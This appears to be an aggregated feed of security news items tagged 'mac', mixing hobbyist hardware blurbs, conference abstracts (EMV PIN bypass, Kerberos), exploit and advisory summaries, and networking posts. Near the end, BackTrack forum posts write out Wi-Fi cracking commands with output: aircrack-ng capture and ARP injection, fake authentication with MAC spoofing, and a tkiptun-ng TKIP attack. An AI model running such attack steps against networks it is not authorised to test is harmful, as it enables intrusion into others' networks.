170 items tagged "mac"
12:01 » Hack a Day
A few months ago [Antti Palosaari] discovered cheap USB TV tuners could be used as a software-defined radio. Since then, we’ve seen these TV tuners receive signals from GPS satellites and even the signals between air traffic control and passenger aircraft. Like everything cool, Mac support for these drivers is slightly terrible so [hpux735] wrote his own [...]
21:40 » SecDocs
Authors: Steven J. Murdoch
Tags: bank smart card
Event: Chaos Communication Congress 27th (27C3) 2010
Abstract: EMV is the dominant protocol used for smart card payments worldwide, with over 730 million cards in circulation. Known to bank customers as “Chip and PIN”, it is used in Europe; it is being introduced in Canada; and there is pressure from banks to introduce it in the USA too. EMV secures credit and debit card transactions by authenticating both the card and the customer presenting it through a combination of cryptographic authentication codes, digital signatures, and the entry of a PIN. In this paper we describe and demonstrate a protocol flaw which allows criminals to use a genuine card to make a payment without knowing the card’s PIN, and to remain undetected even when the merchant has an online connection to the banking network. The fraudster performs a man-in-the-middle attack to trick the terminal into believing the PIN verified correctly, while telling the issuing bank that no PIN was entered at all. The paper considers how the flaws arose, why they remained unknown despite EMV’s wide deployment for the best part of a decade, and how they might be fixed. Because we have found and validated a practical attack against the core functionality of EMV, we conclude that the protocol is broken. This failure is significant in the field of protocol design, and also has important public policy implications, in light of growing reports of fraud on stolen EMV cards. Frequently, banks deny such fraud victims a refund, asserting that a card cannot be used without the correct PIN, and concluding that the customer must be grossly negligent or lying. Our attack can explain a number of these cases, and exposes the need for further research to bridge the gap between the theoretical and practical security of bank payment systems. Smart cards have gradually replaced magnetic strip cards for point-of-sale and ATM transactions in many countries.
The leading system, EMV (named after Europay, MasterCard, and Visa), has been deployed throughout most of Europe, and is currently being rolled out in Canada. As of early 2008, there were over 730 million EMV compliant smart cards in circulation worldwide. In EMV, customers authorize a credit or debit card transaction by inserting their card and entering a PIN into a point-of-sale terminal; the PIN is typically verified by the smart card chip, which is in turn authenticated to the terminal by a digital certificate. The transaction details are also authenticated by a cryptographic message authentication code (MAC), using a symmetric key shared between the payment card and the bank that issued the card to the customer (the issuer). EMV was heavily promoted under the “Chip and PIN” brand during its national rollout in the UK. The technology was advertised as a solution to increasing card fraud: a chip to prevent card counterfeiting, and a PIN to prevent abuse of stolen cards. Since its introduction in the UK the fraud landscape has changed significantly: lost and stolen card fraud is down, and counterfeit card fraud experienced a two year lull. But no type of fraud has been eliminated, and the overall fraud levels have actually risen (see Figure 1). The likely explanation for this is that EMV has simply moved fraud, not eliminated it. One goal of EMV was to externalise the costs of dispute from the issuing bank, in that if a disputed transaction has been authorised by a manuscript signature, it would be charged to the merchant, while if it had been authorised by a PIN then it would be charged to the customer. The net effect is that the banking industry, which was responsible for the design of the system, carries less liability for the fraud. The industry describes this as a ‘liability shift’. 
In the past few years, the UK media have reported numerous cases where cardholders’ complaints have been rejected by their bank and by government-approved mediators such as the Financial Ombudsman Service, using stock excuses such as ‘Your card was CHIP read and a PIN was used so you must have been negligent.’ Interestingly, an increasing number of complaints from believable witnesses indicate that their EMV cards were fraudulently used shortly after being stolen, despite there having been no possibility that the thief could have learned the PIN. In this paper, we describe a potential explanation. We have demonstrated how criminals can use stolen “Chip and PIN” (EMV) smart cards without knowing the PIN. Since “verified by PIN” – the essence of the system – does not work, we declare the Chip and PIN system to be broken.
10:22 » Packet Storm Security Exploits
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
21:32 » SecDocs
Authors: Harald Welte
Tags: GSM phone
Event: Chaos Communication Congress 28th (28C3) 2011
Abstract: Almost everyone uses the packet oriented transmission modes of cellular networks. However, unlike TCP/IP, Ethernet and Wifi, not many members of the hacker community are familiar with the actual protocol stack for those services. This talk aims to give an in-depth explanation of how the lower layer protocols on the air and wired interfaces for packet data services in cellular networks are structured. For 2.5/2.75G, this includes RLC/MAC, NS, BSSGP, LLC, SNDCP, GTP. For 3G/3.5G, this includes RRC, RLC, PDCP, NBAP, RANAP.
21:27 » Packet Storm Security Exploits
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
11:01 » Hack a Day
[Bradley Gawthrop's] biggest gripe about his laser cutter is the lack of Mac support. We don’t think we’d have any gripes if we owned one of these (yeah, that’s a lie…) but we can understand his second biggest issue which is the inability to see the work piece once it’s inside the machine. He figured [...]
17:10 » Packet Storm Security Recent Files
The cryptographic algorithm called INCrypt32 is a MAC algorithm used to authenticate participants, RFID cards and readers, in HID Global's iCLASS systems. HID's iCLASS cards are widely used contactless smart cards for physical access control. Although INCrypt32 is the heart of the security of HID's iCLASS systems, its security has not been evaluated yet since the specification has not been open to the public. In this paper, they reveal the specification of INCrypt32 by reverse engineering an iCLASS card and investigate the security of INCrypt32. As a result, we show that the secret key of size 64 bits can be recovered using only 2^18 MAC queries if the attacker can request a MAC for chosen messages of arbitrary length. If the length of messages is limited to pre-determined values by the authentication protocol, the required number of MAC queries grows to 2^42 to recover the secret key.
15:24 » Packet Storm Security Recent Files
WOL-E is a suite of tools for the Wake on LAN feature of network attached computers; this feature is now enabled by default on many Apple computers. These tools include brute-forcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
17:20 » Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
17:20 » Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
18:59 » Packet Storm Security Advisories
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled allows remote attackers to cause application crashes and potentially allow execution of arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.
13:25 » Hack a Day
[Ricard Dias] wrote in to tell us about his guide for developing Linux applications on a Mac. He really enjoys the development environment provided by XCode, and it doesn’t take much to make it work as an all-in-one solution for Linux development. The real trick here is the use of SSH to access a Linux [...]
6:04 » Packet Storm Security Recent Files
Technitium MAC Address Changer allows you to change the Media Access Control (MAC) address of your Network Interface Card (NIC) irrespective of your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.
16:48 » Packet Storm Security Recent Files
A MAC changing utility that uses both ifconfig and GNU-Macchanger (it checks whether macchanger exists and, if not, uses ifconfig) to spoof one's MAC with a totally random value. Written in Python.
10:17 » Packet Storm Security Recent Files
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
-
15:01
»
Hack a Day
As a new recruit to the 68k Macintosh Liberation Army, [dougg3] is really showing off his hardware hacking ability. He came up with a replacement ROM SIMM for his Mac IIci and made it play the Mario theme on boot instead of the normal chimes. Swapping out the ROM in these old macs isn’t an [...]
-
11:52
»
SecDocs
Authors: Brad Hill, Rachel Engel, Scott Stender
Tags: Kerberos
Event: Black Hat USA 2010
Abstract: The Kerberos protocol provides single sign-on authentication services for users and machines. Its availability on nearly every popular computing platform - Windows, Mac, and UNIX variants - makes it the primary choice for enterprise authentication. However, simply "adding a dash of Kerberos" does not magically make a network secure. Kerberos is a complicated protocol whose comprehensive description requires dozens of RFCs. To use it securely requires a careful dance between protocol designers, service developers, and system administrators – the kind of dance that never quite stays in step. A careful review of RFCs, deployment guidance, and developer reference materials reveals a host of “theoretical” flaws when Kerberos is used. This presentation will demonstrate new techniques that make the theoretical practical in common Kerberos deployments, and provide guidance to ensure that software and systems are hardened against attack.
-
-
18:01
»
Packet Storm Security Recent Files
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
-
14:05
»
Hack a Day
[Steve] over at Big Mess O’ Wires has never been so happy to see the “Sad Mac” icon. A little over a month ago, he decided to take on the task of building his own Mac clone using modern technology. Not to be confused with Mac emulation on modern hardware, he is attempting to build [...]
-
-
15:00
»
Sophos security news
Anti-Virus software for Mac delivers complete security and support for business and home users of popular Mac operating systems
-
-
9:01
»
Hack a Day
When [Liu] decided he wanted one of the new iPads, rather than fork out the cash he decided to build his own tablet Mac. His creation functions just as you would expect any tablet PC to, with some nice extra features such as running Windows XP for any of you Microsoft lovers. [Liu’s] tablet apparently [...]
-
-
23:28
»
Sophos product advisories
If you install SafeGuard Disk Encryption for Mac 5.50.1 on Mac OS X 10.7 (Lion), Mac OS X 10.7 will no longer start. Instead the computer boots up into the Mac OS X Recovery partition.
-
-
9:05
»
Hack a Day
Here’s a way to gain control of your projects using an Android device. Bluescripts is a free app available in the Android market that makes it a bit easier to make interfaces to send customizable messages. If you have a Bluetooth receiver in your project, connecting to it is as easy as putting the MAC [...]
-
-
6:06
»
Hack a Day
[Phillip Torrone] gave us a heads up about a project he and [Limor Fried] along with [Mike Doell] have just wrapped up. Their aptly-named “iCufflinks” softly pulsate with light the same way in which you see many Mac products do. The cufflinks are made from machined aluminum and have the ubiquitous “power symbol” milled into [...]
-
-
19:15
»
Packet Storm Security Advisories
Secunia Security Advisory - Two vulnerabilities have been reported in Microsoft Office for Mac, which can be exploited by malicious people to compromise a user's system.
-
19:34
»
Packet Storm Security Recent Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios involving the use of various types of TCP/IP packets. It is able to send certain types of packets to any specific target and to manipulate various fields at runtime. These fields in the packet structure, such as the Source/Destination IP address and Source/Destination MAC address, can be modified.
-
-
21:44
»
Packet Storm Security Advisories
Secunia Security Advisory - A vulnerability has been reported in Skype for Mac, which can be exploited by malicious people to compromise a user's system.
-
-
8:49
»
Packet Storm Security Advisories
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.
-
-
16:39
»
Packet Storm Security Recent Files
Monocle is a local network host discovery tool. In passive mode, it listens for ARP request and reply packets. In active mode, it sends ARP requests to the specified IP range. The result is a list of the IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
-
11:05
»
Packet Storm Security Advisories
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.
-
-
17:18
»
Packet Storm Security Recent Files
Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. This python code demonstrates the issue.
-
7:59
»
Packet Storm Security Recent Files
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux; these currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features: multiple packet capture sources, runtime network sorting by AP MAC address (BSSID), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal- and tcpdump-compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) logging, secure SUID behavior, and GPS device and wireless device fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
-
-
9:10
»
Packet Storm Security Exploits
Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.
-
-
15:22
»
Wirevolution
Although phone numbers are an antiquated kind of thing, we are sufficiently beaten down by the machines that we think of it as natural to identify a person by a 10 digit number. Maybe the demise of the numeric phone keypad as big touch-screens take over will change matters on this front. But meanwhile, phone numbers are holding us back in important ways. Because phone numbers are bound to the PSTN, which doesn’t carry video calls, it is harder to make video calls than voice, because we don’t have people’s video addresses so handy.
This year, three new products attempted to address this issue in remarkably similar ways – clearly an idea whose time has come. The products are Apple’s FaceTime, Cisco’s IME and a startup product called Tango.
In all three of these products, you make a call to a regular phone number, which triggers a video session over the Internet. You only need the phone number – the Internet addressing is handled automatically. The two problems the automatic addressing has to handle are finding a candidate address, then verifying that it is the right one. Here’s how each of those three new products does the job:
1. FaceTime. When you first start FaceTime, it sends an SMS (text message) to an Apple server. The SMS contains sufficient information for the Apple server to reliably associate your phone number with the XMPP (push services) client running on your iPhone. With this authentication performed, anybody else who has your phone number in their address book on their iPhone or Mac can place a videophone call to you via FaceTime.
2. Cisco IME (Inter-Company Media Engine). The protocol used by IME to securely associate your phone number with your IP address is ViPR (Verification Involving PSTN Reachability), an open protocol specified in several IETF drafts co-authored by Jonathan Rosenberg, who is now at Skype. ViPR can be embodied in a network box like IME, or in an endpoint like a phone or PC.
Here’s how it works: you make a phone call in the usual way. After you hang up, ViPR looks up the phone number you called to see if it is also ViPR-enabled. If it is, ViPR performs a secure mutual verification, by using proof-of-knowledge of the previous PSTN call as a shared secret. The next time you dial that phone number, ViPR makes the call through the Internet rather than through the phone network, so you can do wideband audio and video with no per-minute charge. A major difference between ViPR and FaceTime or Tango is that ViPR does not have a central registration server. The directory that ViPR looks up phone numbers in is stored in a distributed hash table (DHT). This is basically a distributed database with the contents stored across the network. Each ViPR participant contributes a little bit of storage to the network. The DHT itself defines an algorithm – called Chord – which describes how each node connects to other nodes, and how to look up information.
3. Tango, like FaceTime, has its own registration servers. The authentication on these works slightly differently. When you register with Tango, it looks in the address book on your iPhone for other registered Tango users, and displays them in your Tango address book. So if you already know somebody’s phone number, and that person is a registered Tango user, Tango lets you call them in video over the Internet.
-
-
13:00
»
Hack a Day
[Sprite_TM] cooked up an amazing hack by resurrecting a Mac SE using a Dockstar and ARM processor. The retro hardware had a bad mainboard thanks to the corrosive properties of a failed backup-battery. He had been wanting to do something with the Seagate Dockstar and decided it would find a nice home in the Mac. [...]
-
-
12:00
»
Hack a Day
Evil Mad Scientist Laboratories is preparing for Halloween with this standby-mode pumpkin. Inside there’s an LED plugging a hole that is drilled just to the skin of the gourd-like vegetable. It fades in and out similar to a sleeping Mac, using what we think is a vastly over-powered circuit based on an ATtiny2313 (1k of [...]
-
-
5:34
»
Hack a Day
[Enigma-penguin] built a tablet computer out of a Core2Duo Macbook circa 2007. The battery exploded, damaging the case and a few components inside. But there was hope for a new life as a tablet computer. He removed the screen and tested to make sure the computer would still function without it by using the video [...]
-
-
13:45
»
remote-exploit & backtrack
Hello, friends.
Do you know about any way to increase the (always short: 10 or so) number of Static DHCP List entries that routers usually have?
I am talking about the IP assignment that a certain MAC connecting to the local network will get.
Thanks :).
-
-
13:01
»
Packet Storm Security Tools
NMB Scanner scans the shares of a SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the hosts lists maintained by master browsers.
-
-
17:29
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-156 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. Unspecified vulnerability in FreeType 2.3.9, and other versions before 2.4.2, allows remote attackers to cause a denial of service via vectors involving nested Standard Encoding Accented Character calls, related to psaux.h, cffgload.c, cffgload.h, and t1decode.c.
-
17:29
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-157 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. The updated packages have been patched to correct these issues.
-
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 64bit binary release.
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 32bit binary release.
-
19:03
»
Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Mac OSX source release.
-
-
18:35
»
SecuriTeam
A Denial of Service vulnerability was discovered in Skype for Mac.
-
-
18:24
»
Wirevolution
A while back the Wi-Fi Alliance announced a new certification program, Wi-Fi Direct, which enables a PC to connect directly with other Wi-Fi devices without having to go through an Access Point.
The Wi-Fi certification process for Wi-Fi Direct is scheduled to be launched by the end of 2010, but there are already two pre-standard implementations of this concept, My Wi-Fi, an Intel product which ships in Centrino 2 systems, and Wireless Hosted Network which ships in all versions of Windows 7.
The Wi-Fi Direct driver makes a single Wi-Fi adapter on the PC look like two to the operating system: one ordinary one that associates with a regular Access Point, and a second acting as a “Virtual Access Point.” The virtual access point (Microsoft calls it a “SoftAP”) actually runs inside the Wi-Fi driver on the PC (labeled WPAN I/F in the Intel diagram below).

To the outside world the Wi-Fi adapter also looks like two devices, each with its own MAC address: one is the PC, exactly as it appears without Wi-Fi Direct, and the other is an access point. Devices that associate with that access point join the PC’s PAN (Personal Area Network).
This yields several benefits in various use cases.
I wrote a couple of years ago about how a company called Ozmo planned to use a Wi-Fi PAN to connect peripherals to PCs, replacing Bluetooth and proprietary wireless technologies. That plan has now come to fruition. Earlier this month Ozmo announced that it had received $10.8 million in additional funding, and this week it announced two major customers: Primax, a leading ODM of wireless mice, and NMB Technologies, a leading ODM of wireless keyboards.
Here’s a slide from one of their promotional presentations giving a comparison with Bluetooth and proprietary technologies:

The essence of Ozmo’s approach is low cost, multi-device, low bandwidth and low power consumption. Wi-Fi Direct has another use case that is high bandwidth, with no requirement for low power.
If you want to stream video from your PC to a monitor using traditional Wi-Fi (“infrastructure mode”) each packet goes from the PC to the access point, then from the access point to the TV, so it occupies the spectrum twice for each packet. Wi-Fi Direct effectively doubles the available throughput, since each packet flies through the ether only once, directly from the PC to the TV. But it actually does better than that. Supposing the PC and the TV are in the same room, but the access point is in a different room, the PC can transmit at much lower power. Another similar Wi-Fi Direct session can then happen in another room in the house. Without Wi-Fi direct the two sessions would have to share the access point, taking turns to use the spectrum. So we get increased aggregate throughput both from halving the number of packet transmissions, and from allowing simultaneous use of the spectrum by multiple sessions (if they are far enough apart).
A Wi-Fi buff would point out that you can already do all this with ad-hoc mode, but Wi-Fi Direct purports to be usable by mortals, and to work interoperably, neither of which could be said for ad-hoc mode until recently. In January Infinitec announced a new point-to-point video streaming product that claims to be easy to use and universally interoperable, that Engadget implies uses ad-hoc mode, though Google can’t find the words “ad hoc” on the Infinitec website.
Between the bandwidth extremes of mice and TVs, lie numerous other potential uses, like headsets (which Ozmo also supports); syncing phones, cameras and media players; and wireless printers.
-
-
9:04
»
Packet Storm Security Exploits
This Metasploit module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista.
-
-
0:33
»
remote-exploit & backtrack
Hello everyone, :D
I have followed lots of posts in order to crack my WEP key, and I managed to find the key of my Livebox (thanks to everyone who wrote all those posts), but then I can't find how to connect to the Internet under BackTrack. I haven't tried under Windows (since under BackTrack I ran macchanger) to be able to retrieve the key.
I suppose that under Windows it will use my real MAC and will kick me off since I don't have the right MAC. Now you will tell me "try before posting", but as it was nearly three in the morning and I had to be fit for work, I didn't take the time to test. And besides, I like to understand how all this works.
Thank you for your answers.
-
-
2:03
»
remote-exploit & backtrack
Hi guys.
I'll try to be thorough.
Following the recommendations of many posters here, I recently acquired an ALFA AWUS036H (rtl8187 driver) and am trying to break into my (own: I do not endorse illegal activity in any way) WEP-enabled router.
I am not in the habit of posting in forums for basic inquiries (as most information is on Google these days if one searches enough), but I find myself in need of assistance.
I am running BackTrack 4 final (released 11.01.2010) and issuing the following commands:
Code:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.
However I fail to get the association succeeded :-) message.
On the contrary, I get DeAuth'ed and I can't seem to understand why.
(In fact, it loops on:
Code:
Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")
The aireplay-ng --test succeeds with 30/30 and I've tried the fake auth at various places around the house, with the same result. I've also disabled MAC filtering and tried variations of the aireplay-ng -1, such as the more detailed -1 attack on the aircrack wiki, and with -x 180 to limit packets, but to no avail.
The Association Succeeded :-) message has appeared briefly once however, after I macchanged my wlan0 to one of the connected PC's. The #/s rating jumped, and the ARP attack looked like it was working. I wasn't using keep-alive though and eventually got deauthed, and using the same mac address spoof associated no longer thereafter (rather, it gets deauth packets like mad).
I've read around and some other people have had similar problems, though I couldn't find a clear solution. If the answer to this has been posted elsewhere and I've missed it in my search, could someone please point me to it? Any help is appreciated.
-
-
13:11
»
remote-exploit & backtrack
I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.
My wireless card was:
Code:
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
I changed it to monitor mode:
Code:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
And then I test injection:
Code:
root@bt:~# aireplay-ng -9 mon0
20:59:17 Trying broadcast probe requests...
20:59:17 Injection is working!
20:59:19 Found 1 AP
20:59:19 Trying directed probe requests...
20:59:19 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
20:59:21 Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
20:59:21 30/30: 100%
Then I started collecting IVs:
Code:
root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B -w output mon0
CH 6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:F8:84:31:1B -21 100 8943 178 0 6 54 WEP WEP OPN Shatel
BSSID STATION PWR Rate Lost Packets Probes
00:23:F8:84:31:1B 00:24:D6:11:62:18 0 0 - 1 0 411384
And then I made a fake authentication:
Code:
root@bt:~# macchanger -s mon0
Current MAC: 00:24:d6:11:62:18 (unknown)
root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
21:17:45 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
21:17:45 Sending Authentication Request (Open System) [ACK]
21:17:45 Authentication successful
21:17:45 Sending Association Request [ACK]
21:17:45 Association successful :-) (AID: 1)
21:17:55 Sending keep-alive packet
And finally I started injection:
Code:
root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
20:36:51 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
Saving ARP requests in replay_arp-0311-203651.cap
You should also start airodump-ng to capture replies.
Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)
But injection didn't make any change in the speed of collecting packets (#/s).
I did this again:
Code:
root@bt:~# aireplay-ng -9 mon0
21:22:49 Trying broadcast probe requests...
21:22:51 No Answer...
21:22:51 Found 3 APs
21:22:51 Trying directed probe requests...
21:22:51 00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
21:22:57 0/30: 0%
21:22:57 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
21:23:03 0/30: 0%
21:23:03 00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
21:23:09 0/30: 0%
and it seems that injection is not working!
What should I do?! How can I collect IVs faster?! (Now it takes days [or weeks!] to collect enough packets!)
Thanks!
-
-
15:05
»
remote-exploit & backtrack
so that my computer as for my mac address does not appear on the routers DHCP table or any other data logs.
Thanks in advance.
-
5:54
»
remote-exploit & backtrack
Run TKIP keystream discovery attack:
root@bt:~# tkiptun-ng -a 00:18:39:D3:FB:A0 -h 00:1E:65:F8:BA:A8 -m 80 -n 100 wlan0
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
08:24:01 Michael Test: Successful
08:24:01 Waiting for beacon frame (BSSID: 00:18:39:D3:FB:A0) on channel 2
08:24:01 Found specified AP
08:24:01 WPA handshake: 00:18:39:D3:FB:A0 captured65:F8:BA:A8] [ 6| 3 ACKs]
08:24:01 Sending 4 directed DeAuth. STMAC: [00:1E:65:F8:BA:A8] [ 9| 6 ACKs]
08:24:02 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Got the answer!
08:24:09 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
08:24:31 Offset 81 ( 0% done) | xor = 49 | pt = 40 | 122 frames written in 100055ms
08:25:47 Offset 80 ( 2% done) | xor = 8B | pt = 2A | 155 frames written in 127108ms
08:27:03 Offset 79 ( 4% done) | xor = 39 | pt = 01 | 163 frames written in 133657ms
